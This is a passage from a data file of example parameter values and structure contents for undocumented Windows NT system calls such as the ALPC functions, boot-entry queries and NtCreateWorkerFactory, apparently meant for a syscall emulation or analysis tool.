"structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00004000", "additionalComment": "SIZE_T MessageSize (16 KB typical message size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Reserved (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000555", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcCreateSectionView": { "ntFunc": "NtAlpcCreateSectionView", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to ALPC_DATA_VIEW ViewAttributes (dummy pointer)", "structurePointer": "ALPC_DATA_VIEW", "structureRef": "struct24", "structureValueExpectations": "Base address, size, and flags for the section view.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Reserved (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000555", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct24": { "type": "ALPC_DATA_VIEW", "fields": [ { "fieldName": "Base", "fieldType": "PVOID", "fieldValue": "0x00400000", "fieldComment": "Base address of the section view" }, { "fieldName": "Size", "fieldType": "SIZE_T", "fieldValue": "0x00001000", "fieldComment": "Size of the view (4 KB)" }, { "fieldName": "Flags", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "View is committed" } ] } } }, "NtAlpcCreateSecurityContext": { "ntFunc": "NtAlpcCreateSecurityContext", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to ALPC_SECURITY_ATTRIBUTES SecurityAttribute (dummy pointer)", "structurePointer": "ALPC_SECURITY_ATTRIBUTES", "structureRef": "struct25", "structureValueExpectations": "Security descriptor, context flags, QoS, etc.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Reserved (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000555", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct25": { "type": "ALPC_SECURITY_ATTRIBUTES", "fields": [ { "fieldName": "Flags", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Default security context" }, { "fieldName": "QoS", "fieldType": "SECURITY_QUALITY_OF_SERVICE", "fieldValue": "0xbadd0050", "fieldComment": "Pointer to SECURITY_QUALITY_OF_SERVICE (dummy pointer)" }, { "fieldName": "SecurityDescriptor", "fieldType": "PSECURITY_DESCRIPTOR", "fieldValue": "0x00000000", "fieldComment": "None (no custom security descriptor)" } ] } } }, "NtAlpcDeletePortSection": { "ntFunc": "NtAlpcDeletePortSection", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE SectionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Reserved (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000555", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcDeleteResourceReserve": { "ntFunc": "NtAlpcDeleteResourceReserve", "pushes": [ { "value": "0x0000abcd", "additionalComment": "HANDLE ResourceID (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "__reserved ULONG (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000cafe", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcDeleteSectionView": { "ntFunc": "NtAlpcDeleteSectionView", "pushes": [ { "value": "0x00400000", "additionalComment": "PVOID ViewBase (example mapped base address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "__reserved ULONG (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000cafe", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcDeleteSecurityContext": { "ntFunc": "NtAlpcDeleteSecurityContext", "pushes": [ { "value": "0x0000beef", "additionalComment": "HANDLE ContextHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "__reserved ULONG (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000cafe", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcDisconnectPort": { "ntFunc": "NtAlpcDisconnectPort", "pushes": [ { "value": "0x00000001", "additionalComment": "ULONG Flags (ALPC_DISCONNECT_SEND_NOTIFICATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000cafe", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcImpersonateClientOfPort": { "ntFunc": "NtAlpcImpersonateClientOfPort", "pushes": [ { "value": "0x00000000", "additionalComment": "__reserved PVOID (must be None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to PORT_MESSAGE (dummy pointer)", "structurePointer": "PORT_MESSAGE", "structureRef": "struct26", "structureValueExpectations": "Message header and client information.", "pointedValue": None }, { "value": "0x0000cafe", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct26": { "type": "PORT_MESSAGE", "fields": [ { "fieldName": "u1.s1.DataLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Length of message data" }, { "fieldName": "u1.s1.TotalLength", "fieldType": "USHORT", "fieldValue": "0x0030", "fieldComment": "Total length including header" }, { "fieldName": "u2.s2.Type", "fieldType": "USHORT", "fieldValue": "0x0001", "fieldComment": "Message type (e.g., LPC_REQUEST)" }, { "fieldName": "u2.s2.DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Offset to data info (if any)" }, { "fieldName": "ClientId.UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99994444", "fieldComment": "Dummy process ID" }, { "fieldName": "ClientId.UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x88883333", "fieldComment": "Dummy thread ID" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00001234", "fieldComment": "Message identifier" }, { "fieldName": "ClientViewSize", "fieldType": "SIZE_T", "fieldValue": "0x00000000", "fieldComment": "Typically zero unless using views" } ] } } }, "NtAlpcOpenSenderProcess": { "ntFunc": "NtAlpcOpenSenderProcess", "pushes": [ { "value": "0x00000000", "additionalComment": "None for POBJECT_ATTRIBUTES (optional, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Optional; typically None unless filtering by object attributes.", "pointedValue": None }, { "value": "0x001F0FFF", "additionalComment": "ACCESS_MASK Access (PROCESS_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Reserved ULONG (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to PORT_MESSAGE (dummy pointer, required)", "structurePointer": "PORT_MESSAGE", "structureRef": "struct27", "structureValueExpectations": "PORT_MESSAGE structure describing the ALPC message.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to HANDLE ProcessHandle (dummy pointer, receives process handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct27": { "type": "PORT_MESSAGE", "fields": [ { "fieldName": "u1.s1.TotalLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Total length of the message" }, { "fieldName": "u1.s1.DataLength", "fieldType": "USHORT", "fieldValue": "0x0018", "fieldComment": "Length of the data" }, { "fieldName": "u2.s2.Type", "fieldType": "USHORT", "fieldValue": "0x0001", "fieldComment": "Message type" }, { "fieldName": "u2.s2.DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId.UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99990001", "fieldComment": "Dummy process ID" }, { "fieldName": "ClientId.UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x99990002", "fieldComment": "Dummy thread ID" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Message identifier" }, { "fieldName": "ClientViewSize", "fieldType": "SIZE_T", "fieldValue": "0x00000000", "fieldComment": "No client view" } ] } } }, "NtAlpcOpenSenderThread": { "ntFunc": "NtAlpcOpenSenderThread", "pushes": [ { "value": "0x00000000", "additionalComment": "None for POBJECT_ATTRIBUTES (optional, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Optional; typically None unless filtering by object attributes.", "pointedValue": None }, { "value": "0x00100020", "additionalComment": "ACCESS_MASK Access (THREAD_QUERY_INFORMATION | THREAD_SUSPEND_RESUME)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Reserved ULONG (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to PORT_MESSAGE (dummy pointer, required)", "structurePointer": "PORT_MESSAGE", "structureRef": "struct28", "structureValueExpectations": "PORT_MESSAGE structure describing the ALPC message.", "pointedValue": None }, { "value": "0x00000555", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE ThreadHandle (dummy pointer, receives thread handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct28": { "type": "PORT_MESSAGE", "fields": [ { "fieldName": "u1.s1.TotalLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Total length of the message" }, { "fieldName": "u1.s1.DataLength", "fieldType": "USHORT", "fieldValue": "0x0018", "fieldComment": "Length of the data" }, { "fieldName": "u2.s2.Type", "fieldType": "USHORT", "fieldValue": "0x0002", "fieldComment": "Message type" }, { "fieldName": "u2.s2.DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId.UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99990003", "fieldComment": "Dummy process ID" }, { "fieldName": "ClientId.UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x99990004", "fieldComment": "Dummy thread ID" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "Message identifier" }, { "fieldName": "ClientViewSize", "fieldType": "SIZE_T", "fieldValue": "0x00000000", "fieldComment": "No client view" } ] } } }, "NtAlpcQueryInformation": { "ntFunc": "NtAlpcQueryInformation", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, optional)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000020", "additionalComment": "ULONG Length (buffer size, 32 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to output buffer (dummy pointer, receives information)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "ALPC_PORT_INFORMATION_CLASS PortInformationClass (AlpcBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000666", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcQueryInformationMessage": { "ntFunc": "NtAlpcQueryInformationMessage", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, optional)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000010", "additionalComment": "ULONG Length (buffer size, 16 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to output buffer (dummy pointer, receives information)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000002", "additionalComment": "ALPC_MESSAGE_INFORMATION_CLASS MessageInformationClass (AlpcMessageBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to PORT_MESSAGE (dummy pointer, required)", "structurePointer": "PORT_MESSAGE", "structureRef": "struct29", "structureValueExpectations": "PORT_MESSAGE structure describing the ALPC message.", "pointedValue": None }, { "value": "0x00000777", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct29": { "type": "PORT_MESSAGE", "fields": [ { "fieldName": "u1.s1.TotalLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Total length of the message" }, { "fieldName": "u1.s1.DataLength", "fieldType": "USHORT", "fieldValue": "0x0008", "fieldComment": "Length of the data" }, { "fieldName": "u2.s2.Type", "fieldType": "USHORT", "fieldValue": "0x0003", "fieldComment": "Message type" }, { "fieldName": "u2.s2.DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId.UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99990005", "fieldComment": "Dummy process ID" }, { "fieldName": "ClientId.UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x99990006", "fieldComment": "Dummy thread ID" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000003", "fieldComment": "Message identifier" }, { "fieldName": "ClientViewSize", "fieldType": "SIZE_T", "fieldValue": "0x00000000", "fieldComment": "No client view" } ] } } }, "NtAlpcRevokeSecurityContext": { "ntFunc": "NtAlpcRevokeSecurityContext", "pushes": [ { "value": "0x00000888", "additionalComment": "HANDLE ContextHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Reserved ULONG (must be zero)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000999", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcSendWaitReceivePort": { "ntFunc": "NtAlpcSendWaitReceivePort", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for PLARGE_INTEGER Time_Out (no timeout specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for PALPC_MESSAGE_ATTRIBUTES ReceiveMessageAttributes (no receive attributes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for PULONG BufferLength (no receive buffer length)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for PPORT_MESSAGE ReceiveMessage (no receive message buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for PALPC_MESSAGE_ATTRIBUTES SendMessageAttributes (no send attributes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for PPORT_MESSAGE SendMessage (no send message buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Flags = 0 (no special flags)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None PortHandle (no port specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAlpcSetInformation": { "ntFunc": "NtAlpcSetInformation", "pushes": [ { "value": "0x00000000", "additionalComment": "Length = 0 (no information provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for PortInformation (no information buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PortInformationClass = 0 (unspecified information class)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None PortHandle (no port specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtEnumerateBootEntries": { "ntFunc": "NtEnumerateBootEntries", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for PULONG BufferLength (no buffer length provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for Buffer (no buffer provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtEnumerateDriverEntries": { "ntFunc": "NtEnumerateDriverEntries", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for PULONG BufferLength (no buffer length provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for Buffer (no buffer provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtEnumerateSystemEnvironmentValuesEx": { "ntFunc": "NtEnumerateSystemEnvironmentValuesEx", "pushes": [ { "value": "0x00000000", "additionalComment": "None pointer for PULONG BufferLength (no buffer length provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "None pointer for Buffer (no buffer provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "InformationClass = 0 (Environment Value Information Class, unspecified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryBootEntryOrder": { "ntFunc": "NtQueryBootEntryOrder", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG Count (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000003" }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG array Ids (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" } ], "structures": {} }, "NtQueryBootOptions": { "ntFunc": "NtQueryBootOptions", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG BootOptionsLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000040" }, { "value": "0xbadd0030", "additionalComment": "Pointer to BOOT_OPTIONS structure (dummy pointer)", "structurePointer": "BOOT_OPTIONS", "structureRef": "struct30", "structureValueExpectations": "Version, Length, Timeout, CurrentBootEntryId, NextBootEntryId, HeadlessTerminal.", "pointedValue": None } ], "structures": { "struct30": { "type": "BOOT_OPTIONS", "fields": [ { "fieldName": "Version", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Version 1" }, { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "Structure size" }, { "fieldName": "Timeout", "fieldType": "ULONG", "fieldValue": "0x0000001e", "fieldComment": "30 seconds" }, { "fieldName": "CurrentBootEntryId", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Current boot entry ID" }, { "fieldName": "NextBootEntryId", "fieldType": "ULONG", "fieldValue": "0x00000002", "fieldComment": "Next boot entry ID" }, { "fieldName": "HeadlessTerminal", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Not headless" } ] } } }, "NtQueryDriverEntryOrder": { "ntFunc": "NtQueryDriverEntryOrder", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to ULONG Count (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000002" }, { "value": "0xbadd0050", "additionalComment": "Pointer to ULONG array Ids (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" } ], "structures": {} }, "NtQuerySystemEnvironmentValueEx": { "ntFunc": "NtQuerySystemEnvironmentValueEx", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Optional pointer to ULONG (dummy pointer, optional parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0070", "additionalComment": "Pointer to ULONG ValueLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0xbadd0080", "additionalComment": "Pointer to buffer for Value (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x41414141" }, { "value": "0xbadd0090", "additionalComment": "Pointer to GUID VendorGuid (dummy pointer)", "structurePointer": "GUID", "structureRef": "struct31", "structureValueExpectations": "Vendor GUID for the environment variable.", "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to UNICODE_STRING VariableName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct32", "structureValueExpectations": "UNICODE_STRING describing the variable name.", "pointedValue": None } ], "structures": { "struct31": { "type": "GUID", "fields": [ { "fieldName": "Data1", "fieldType": "ULONG", "fieldValue": "0x12345678", "fieldComment": "Sample GUID Data1" }, { "fieldName": "Data2", "fieldType": "USHORT", "fieldValue": "0x9abc", "fieldComment": "Sample GUID Data2" }, { "fieldName": "Data3", "fieldType": "USHORT", "fieldValue": "0xdef0", "fieldComment": "Sample GUID Data3" }, { "fieldName": "Data4", "fieldType": "UCHAR[8]", "fieldValue": "0x1122334455667788", "fieldComment": "Sample GUID Data4" } ] }, "struct32": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "String length in bytes" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum buffer size in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd00c0", "fieldComment": "Pointer to string buffer (dummy pointer)" } ] } } }, "NtSetBootEntryOrder": { "ntFunc": "NtSetBootEntryOrder", "pushes": [ { "value": "0x00000002", "additionalComment": "ULONG Count (number of entries)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to ULONG array Ids (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" } ], "structures": {} }, "NtSetDriverEntryOrder": { "ntFunc": "NtSetDriverEntryOrder", "pushes": [ { "value": "0x00000002", "additionalComment": "ULONG Count (number of driver IDs to set)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG Ids (dummy pointer, array of driver IDs)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000123" } ], "structures": {} }, "NtQuerySystemInformationEx": { "ntFunc": "NtQuerySystemInformationEx", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Optional pointer to ULONG (dummy pointer, receives return length)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000080" }, { "value": "0x00000100", "additionalComment": "ULONG SystemInformationLength (256 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to buffer for SystemInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000040", "additionalComment": "ULONG QueryInformationLength (64 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to buffer for QueryInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000007", "additionalComment": "SYSTEM_INFORMATION_CLASS SystemInformationClass (e.g., SystemProcessInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtInitializeNlsFiles": { "ntFunc": "NtInitializeNlsFiles", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to LARGE_INTEGER DefaultCasingTableSize (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct33", "structureValueExpectations": "64-bit integer representing table size.", "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to LCID DefaultLocaleId (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000409" }, { "value": "0xbadd0060", "additionalComment": "Pointer to base address for NLS files (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x7ffd0000" } ], "structures": { "struct33": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000100000", "fieldComment": "Default casing table size (1MB)" } ] } } }, "NtAcquireCMFViewOwnership": { "ntFunc": "NtAcquireCMFViewOwnership", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN replaceExisting (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to BOOLEAN tokenTaken (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0080", "additionalComment": "Pointer to ULONGLONG TimeStamp (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x01d8c0de" } ], "structures": {} }, "NtCreateProfileEx": { "ntFunc": "NtCreateProfileEx", "pushes": [ { "value": "0xbadd0090", "additionalComment": "Pointer to GROUP_AFFINITY (dummy pointer)", "structurePointer": "GROUP_AFFINITY", "structureRef": "struct34", "structureValueExpectations": "Processor affinity mask and group number.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG GroupAffinityCount (1 group)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "KPROFILE_SOURCE ProfileSource (e.g., ProfileTime)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG BufferSize (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to ULONG Buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000010", "additionalComment": "ULONG BucketSize (16 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00010000", "additionalComment": "SIZE_T ProfileSize (65536 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to ProfileBase (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00400000" }, { "value": "0x00000444", "additionalComment": "HANDLE Process (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00c0", "additionalComment": "Pointer to HANDLE ProfileHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct34": { "type": "GROUP_AFFINITY", "fields": [ { "fieldName": "Mask", "fieldType": "KAFFINITY", "fieldValue": "0x00000001", "fieldComment": "Processor 0" }, { "fieldName": "Group", "fieldType": "WORD", "fieldValue": "0x0000", "fieldComment": "Group 0" }, { "fieldName": "Reserved", "fieldType": "WORD[3]", "fieldValue": "0x00000000", "fieldComment": "Reserved, set to zero" } ] } } }, "NtCreateWorkerFactory": { "ntFunc": "NtCreateWorkerFactory", "pushes": [ { "value": "0x00001000", "additionalComment": "StackCommit (4KB, typical default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00100000", "additionalComment": "StackReserve (1MB, typical default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000010", "additionalComment": "MaxThreadCount (16 threads, realistic example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, 